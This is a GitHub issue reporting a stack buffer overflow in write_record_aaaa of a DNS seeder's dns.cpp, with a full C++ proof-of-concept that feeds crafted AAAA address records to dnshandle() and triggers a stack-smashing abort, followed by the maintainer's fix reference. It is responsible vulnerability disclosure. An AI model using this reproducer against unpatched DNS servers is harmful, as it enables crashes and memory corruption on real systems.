
Stack corruption

Open guidovranken opened this issue 3 years ago • 2 comments

If a sufficient number of AAAA records is associated with a DNS request, a buffer overflow will occur in write_record_aaaa; up to 11 bytes beyond the end of the output buffer can be overwritten.

Append this to dns.cpp:

/*
 * Fixture table consumed by the cb() callback below: 19 rows of 20 raw
 * bytes, each row copied verbatim into one addr_t slot. The leading byte
 * (0x04 / 0x06) presumably selects the address family and the remaining
 * bytes hold the packed address -- TODO confirm against the addr_t layout.
 */
const uint8_t addresses[19][20] = {
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x04,  },
{ 0x04, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x48, 0x00, 0x00, 0x1E, 0x03, 0x00, 0x00, 0x00, 0x31, 0xFF,  },
{ 0x04, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0xF6, 0xB7, 0xFF, 0xFF, 0xE1, 0xFF, 0xFF, 0xFC, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0xFA, 0xFF, 0x00, 0x00, 0xFF, 0xFF,  },
{ 0x04, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0xF6, 0xB7, 0xFF, 0xFF, 0xE1, 0xFF, 0xFF, 0xFC, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0xFA, 0xFF, 0x00, 0x00, 0xFF, 0xFF,  },
{ 0x04, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x00, 0x02, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0xFF, 0x08, 0x00,  },
{ 0x06, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x30, 0x22, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x80, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x00,  },
{ 0x06, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0xFA, 0xFF, 0x00, 0x00, 0xFF, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x00, 0x02, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x04, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0xFF, 0x08, 0x00,  },
{ 0x06, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x30, 0x22, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x80, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x00,  },
{ 0x04, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x00,  },
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCF, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A,  } };

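/*
 * Address-lookup callback installed into dns_opt_t::cb by main().
 *
 * Fills addr[0..n) from the fixed `addresses` table above, ignoring the
 * requested hostname and the ipv4/ipv6 selectors, and returns n, the number
 * of entries written (never more than max, never more than the table size).
 *
 * max is the caller's capacity for addr and is a signed int. The original
 * compared it against a uint32_t counter, so a negative max was promoted to
 * a huge unsigned bound and the loop ran anyway; reject non-positive values
 * up front instead.
 */
int cb(void *opt, char *requested_hostname, addr_t *addr, int max, int ipv4, int ipv6) {
    (void)opt;
    (void)requested_hostname;
    (void)ipv4;
    (void)ipv6;

    if (max <= 0) {
        return 0;
    }

    /* Bound by the table's real row count rather than a hard-coded 19. */
    const size_t table_rows = sizeof addresses / sizeof addresses[0];
    const size_t limit = (size_t)max < table_rows ? (size_t)max : table_rows;

    /* Each 20-byte row is copied into one addr_t slot; this assumes
     * sizeof(addr_t) >= 20 -- TODO confirm against the addr_t definition. */
    for (size_t i = 0; i < limit; i++) {
        memcpy(&addr[i], addresses[i], sizeof addresses[i]);
    }
    return (int)limit;
}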

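/*
 * Reproducer entry point: hands one fixed DNS query to dnshandle() with the
 * cb() callback supplying the address table above. Returns 0; the reported
 * failure shows up as a stack-protector abort inside dnshandle(), not as a
 * return code.
 */
int main(void)
{
    /* Raw query bytes passed to dnshandle(); sizeof(in) is their length. */
    const uint8_t in[] = {0x1B, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x23, 0x00,
                          0x7A, 0x08, 0x00, 0x00, 0xFF, 0x00, 0xFF};
    /* Response buffer (BUFLEN must be defined earlier in dns.cpp). This is
     * the buffer the report says write_record_aaaa() overruns by up to 11
     * bytes, so it is sized exactly as the real caller sizes it. */
    uint8_t out[BUFLEN];

    /* Zero the whole option block before assigning, so any dns_opt_t field
     * this reproducer does not set explicitly is defined rather than
     * indeterminate -- assumes dns_opt_t is a plain aggregate; TODO confirm. */
    dns_opt_t opt;
    memset(&opt, 0, sizeof opt);
    opt.port = 0;
    opt.datattl = 0;
    opt.nsttl = 0;
    opt.host = "";
    opt.ns = "";
    opt.mbox = "";
    opt.cb = cb;
    opt.nRequests = 0;

    dnshandle(&opt, in, sizeof(in), out);
    return 0;
}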
$ g++ dns.cpp && ./a.out
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)

guidovranken avatar Oct 15 '20 16:10 guidovranken

Thanks for reporting! Should be fixed in b1cf356ff28db0425a935678471f9a3a2242042f.

sipa avatar Oct 19 '20 23:10 sipa

Nice catch @guidovranken!

Very excited about your work: thanks for helping to harden various parts of the Bitcoin ecosystem by trying to break it! :)

I saw the Trezor firmware bug you found in https://github.com/trezor/trezor-firmware/pull/1374 the other day too. Solid work!

practicalswift avatar Nov 30 '20 14:11 practicalswift